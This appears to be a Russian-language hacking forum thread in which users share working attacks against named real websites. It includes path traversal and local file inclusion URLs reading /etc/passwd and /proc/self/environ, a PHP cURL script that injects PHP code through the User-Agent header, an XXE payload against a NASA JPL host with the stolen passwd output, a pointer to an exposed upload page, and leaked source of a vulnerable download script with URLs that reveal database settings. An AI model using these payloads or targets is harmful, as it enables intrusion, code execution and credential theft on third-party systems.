У меня не НАСА, конечно, но очень забавляющий меня эффект от инклуда index'а. http://test.tools.by/?q=stores&page=index
http://www.itisvinci.com/index.php?file=index.php http://www.scholasticorum.mish.uw.edu.pl/index.php?file=php://filter/convert.base64-encode/resource=index.php
http://gugenplan.spb.ru/cms/statistics.php?action=countries&l=../../../../../../../../../../etc/passwd%00&name=phpcounter&page=0 отключаем редирект /usr/home/kga/gugenplan/www/cms/phpcounter/defs.php PHP: @include("langs/en.php"); @include("langs/$lang.php"); @include("langs/$_GET[l].php"); ?>
Тема стара но имеет место быть... Перепробовал уеву тучу путей, кроме этого файла ничего не смог прочитать. У кого есть мысли?
http://www.colibri.ge/display/index.php?z=end&company=hotels/vere/index.php?cat=/proc/self/environ На темной фоне нажать Ctrl+A.
VY_CMa Code: www.torrentreactor.net/browse.php?id=../../../../../../../../../../../../opt/inweb/sites/torrentreactor/www.torrentreactor.net/avatars/1/4/1/7/1417549.jpg%00
http://www.coregamers.us/index.php?id=../../../proc/self/environ%00 Чистая реализация инжекта похапе-кода в хранилище переменных окружения. 1. Гуглим функции сURL'a. 2. Пять минут пишем на коленке кулхацкерский скрипт GET-запроса c подменой Юзер-Агента и возвратом ответа. PHP: <?php $get = curl_init(); curl_setopt($get, CURLOPT_URL, 'http://www.coregamers.us/index.php?id=../../../proc/self/environ%00'); curl_setopt($get, CURLOPT_USERAGENT, '<?php phpinfo(); ?>'); curl_setopt($get, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($get); curl_close($get); echo($result); ?> 3. Запускаем 4. ??? 5. PROFIT!!! Ну, или подменяем Юзер-Агент "на лету", например Tamper Data'ой.
НЭИС-Телеком Сибирь - Спутниковое телевидение Триколор (надоела их реклама) тИЦ: 80 / PR: 2 Code: http://www.[B]satnsk.ru[/B]/index.php?view=[B]/etc/passwd[/B]
Эти ребята ничему не учатся =/ Ещё 1 XML-Inject на NASA.GOV Host = solidearth.jpl.nasa.gov Query Code: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY x3 SYSTEM "[COLOR=Red]/etc/passwd[/COLOR]"> ]> <amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"> <body> <object type="flex.messaging.messages.CommandMessage"> <traits> <string>body</string><string>clientId</string><string>correlationId</string> <string>destination</string><string>headers</string><string>messageId</string> <string>operation</string><string>timestamp</string><string>timeToLive</string> </traits><object><traits /> </object> <null /><string /><string /> <object> <traits> <string>DSId</string><string>DSMessagingVersion</string> </traits> <string>nil</string><int>1</int> </object> <string>&x3;</string> <int>5</int><int>0</int><int>0</int> </object> </body> </amfx> Answear: Code: root:x:0:0:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:/bin/false sys:x:3:3::/: adm:x:4:4:Admin:/var/adm:/bin/false lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/false uucp:x:5:5:uucp Admin:/usr/lib/uucp:/bin/false nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/bin/false smmsp:x:25:25:SendMail Message Submission Program:/:/bin/false isten:x:37:4:Network Admin:/usr/net/nls:/bin/false gdm:x:50:50:GDM Reserved UID:/:/bin/false webservd:x:80:80:WebServer Reserved UID:/opt/home/webservd:/bin/pfsh postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh svctag:x:95:12:Service Tag UID:/: nobody:x:60001:60001:NFS Anonymous Access User:/:/bin/false noaccess:x:60002:60002:No Access User:/:/bin/false nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:/bin/false metrics:x:150:10:System Metrics Account:/opt/metrics:/bin/sh pdiag:x:153:10:Patchdiag Account:/opt/pdiag:/bin/sh sysaudit:x:152:10:System Audit Account:/opt/sysaudit:/bin/sh netiqamc:x:65535:65535::/opt/netiqamc:/bin/sh +@jplit-sa:x:::::: +@web:x:::::: +@ops-level2:x:::::: Ну и вот ещё Code: _ttp://solidearth.jpl.nasa.gov/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/upload/test.html ...если вы понимаете о чём я... =)
Читалка /var/www/web4/html/en-relaunch-2008/download.php PHP: <?PHP $download_dir = "usr/usr_references/download/"; $file = $download_dir . $_GET["imgName"]; if(file_exists($file) && $_GET["imgName"] != "") { // Header header("Content-Type: x-type/subtype"); header("Content-Length: ".filesize($file)); header("Content-Disposition: attachment; filename=" . $_GET["imgName"]); readfile($file); } else { echo "Die Datei '" . $_GET["imgName"] . "' existiert nicht."; } ?> данные для подключения к бд http://relaunch.falken-europe.com/download.php?imgName=../../../includes/php/ProjectSettingsInc.php http://relaunch.falken-europe.com/download.php?imgName=../../../index.php скуля PHP: <?php /** Set flag that this is a parent file */ define( '_VALID_TATW', 1 ); /* In der index.php werden alle ben?tigten Module geladen */ include 'includes/php/ProjectSettingsInc.php'; include 'includes/php/ProjectClassesInc.php'; // 1. globale um die tats?chlich anzuzeigEND pID zu speichern $pageID = $_GET["pid"]; if( $pageID == "") $pageID = "24"; // 2. globale speichert contentXXX.htt und die Ausgabe $pageOutput = ""; // Abfrage Daten aktiver pid $gRes = tATwSYSbase::mySqlQuery ( "SELECT * FROM " . $projektName . "_pages WHERE pId = " . $pageID . ";"); В админке также еще есть инклуд и возможность залить картинку с кодом http://relaunch.falken-europe.com/download.php?imgName=../../../admin/index.php PHP: /* START Global PHP Modul/usr_include editor. Wird verwendet um Includes im Administrationsmen? zu verankern. */ if($_GET['adminusrincludes'] != "" && $_GET['adminsysincludes'] == "") { $pageOutput = $abAP -> getAdminTemplateContent ( "", "aModulEdit.htt"); include "admin_usr_includes/a" . $_GET['adminusrincludes'] . "Inc.php"; } elseif( $_GET['adminusrincludes'] == "" && $_GET['adminsysincludes'] != "") { $pageOutput = $abAP -> getAdminTemplateContent ( "", "aModulEdit.htt"); include "admin_sys_includes/a" . $_GET['adminsysincludes'] . "Inc.php"; } /* END Global PHP Modul/usr_include editor */
